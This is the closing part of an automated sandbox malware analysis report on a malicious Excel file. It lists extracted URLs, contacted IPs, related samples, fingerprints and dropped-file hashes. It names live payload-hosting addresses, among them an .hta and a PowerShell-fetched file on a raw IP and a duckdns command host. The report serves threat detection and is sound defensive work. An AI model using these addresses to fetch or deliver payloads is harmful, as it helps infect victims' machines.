                                                                                                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvD598.tmp.30.drfalse
                                                                                                                                            		high
                                                                                                                                            http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFppowershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaomshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://3105.filemail.com/api/file/get?filppowershell.exe, 0000000F.00000002.512617659.00000000023F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htanmshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://172.234.205.135/1244/creapowershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dlli2hpowershell.exe, 00000005.00000002.453548568.000000001A907000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://cdn.at.atwola.com/_media/uac/msn.htmlbhvD598.tmp.30.drfalse
                                                                                                                                              		high
                                                                                                                                              https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                                                                		high
                                                                                                                                                http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=quizzical&timmshta.exe, 00000004.00000002.428662532.00000000000FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.000000000040E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaC:mshta.exe, 00000004.00000003.427140274.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvD598.tmp.30.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://policies.yahoo.com/w3c/p3p.xmlbhvD598.tmp.30.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.msn.com/advertisement.ad.jsbhvD598.tmp.30.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://3105.filemail.compowershell.exe, 0000000F.00000002.512617659.00000000023F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFC:powershell.exe, 00000005.00000002.454661113.000000001C25F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.493454203.000000001C1C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.ebuddy.comCasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                            		high

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            193.30.119.205
                                                                                                                                                            		ip.3105.filemail.comunknown
                                                                                                                                                            		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                                                                                                                                                            198.244.140.41
                                                                                                                                                            		provit.ukUnited States
                                                                                                                                                            		18630RIDLEYSD-NETUSfalse
                                                                                                                                                            31.13.224.72
                                                                                                                                                            		newbeggin.duckdns.orgBulgaria
                                                                                                                                                            		48584SARNICA-ASBGtrue
                                                                                                                                                            178.237.33.50
                                                                                                                                                            		geoplugin.netNetherlands
                                                                                                                                                            		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                            172.234.205.135
                                                                                                                                                            		unknownUnited States
                                                                                                                                                            		20940AKAMAI-ASN1EUtrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                            Analysis ID:1562330
                                                                                                                                                            Start date and time:2024-11-25 14:05:16 +01:00
                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 8m 56s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                            Number of analysed new started processes analysed:36
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • GSI enabled (VBA)
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Sample name:OC25-11-24.xls
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@45/43@16/5
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 71.4%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 99%
                                                                                                                                                            • Number of executed functions: 155
                                                                                                                                                            • Number of non-executed functions: 321
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Active ActiveX Object
                                                                                                                                                            • Active ActiveX Object
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3060 because there are no executed function
                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 3652 because there are no executed function
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            • VT rate limit hit for: OC25-11-24.xls

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            08:06:36API Interceptor154x Sleep call for process: mshta.exe modified
                                                                                                                                                            08:06:42API Interceptor650x Sleep call for process: powershell.exe modified
                                                                                                                                                            08:06:53API Interceptor26x Sleep call for process: wscript.exe modified
                                                                                                                                                            08:07:22API Interceptor1069017x Sleep call for process: CasPol.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            198.244.140.41Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                  P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                      pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                        Transferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                          PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                                                                            Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                178.237.33.500Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                comprobante.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                Cargo Invoice_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                Synliggre.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                eBHn6qHPLz.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                eBHn6qHPLz.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                mCtN05kxh6.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                                                Bank Fund Transfer-589237.scr.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • geoplugin.net/json.gp

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                provit.ukShipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Transferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                geoplugin.net0Xp3q1l7De.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                comprobante.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                segura.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                Cargo Invoice_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                Synliggre.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                RFQ Nr. 201124559-201124569-201175771.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                eBHn6qHPLz.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                eBHn6qHPLz.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 178.237.33.50
                                                                                                                                                                                mCtN05kxh6.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 178.237.33.50

                                                                                                                                                                                ASNs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                DFNVereinzurFoerderungeinesDeutschenForschungsnetzesehttp://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 141.95.33.120
                                                                                                                                                                                zgp.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 134.96.92.247
                                                                                                                                                                                powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                • 141.56.86.222
                                                                                                                                                                                mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                • 139.30.61.5
                                                                                                                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                • 141.67.203.57
                                                                                                                                                                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                • 141.14.92.147
                                                                                                                                                                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                • 132.199.99.101
                                                                                                                                                                                sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 134.245.99.20
                                                                                                                                                                                sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                • 139.21.35.28
                                                                                                                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                • 149.222.54.7
                                                                                                                                                                                SARNICA-ASBGn5QCsKJ0CP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                • 31.13.224.34
                                                                                                                                                                                ahmbf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                • 31.13.224.69
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                mitradesignworkgoodforeveryoneforgiftedmbestthings.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                • 31.13.224.230
                                                                                                                                                                                Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                • 93.123.109.168
                                                                                                                                                                                09_deb64ed.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                • 31.13.224.230
                                                                                                                                                                                2024-HRDCL-0000796.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 31.13.224.230
                                                                                                                                                                                RIDLEYSD-NETUSShipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Transferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                • 198.244.140.41

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                05af1f5ca1b87cc9cc9b25185115607dShipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                Dl2EmyL53n.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 193.30.119.205
                                                                                                                                                                                7dcce5b76c8b17472d024758970a406bShipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Dl2EmyL53n.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                P0-4856383648383364838364836483.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                Fax-494885 Boswell Automotive Group.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                • 198.244.140.41
                                                                                                                                                                                pi-77159.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                • 198.244.140.41

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4742
                                                                                                                                                                                Entropy (8bit):4.8105940880640246
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                                                                                                MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                                                                                                SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                                                                                                SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                                                                                                SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):122996
                                                                                                                                                                                Entropy (8bit):2.3223020977577686
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:4dEoviHeU1iQsHez/1iQ9r/RSYS0vZzdHerHe51iQ0HeT4rQ:bo6e8iQYeztiQCl0ne7ePiQwekc
                                                                                                                                                                                MD5:D9462EBEF35CAD5FB5CBA7E663570C9C
                                                                                                                                                                                SHA1:AC56E9C1201ABC8EC123A0C59FD2B419DE1158A7
                                                                                                                                                                                SHA-256:792DC91C55F0142C1C1EF561296AC3303C200402DCE73668636088D601997B33
                                                                                                                                                                                SHA-512:E3662833A25C8ABDAC4E98183E3DFFEC417A3A59A8398A4CE2433B197C0237835161A4EADC8222408D50A1C2E9A5DF3A09060EB066810D6E137D454CD3B8EFF7
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicewithgoodthingswhichgosofargoodforeerybody[1].hta, Author: Joe Security
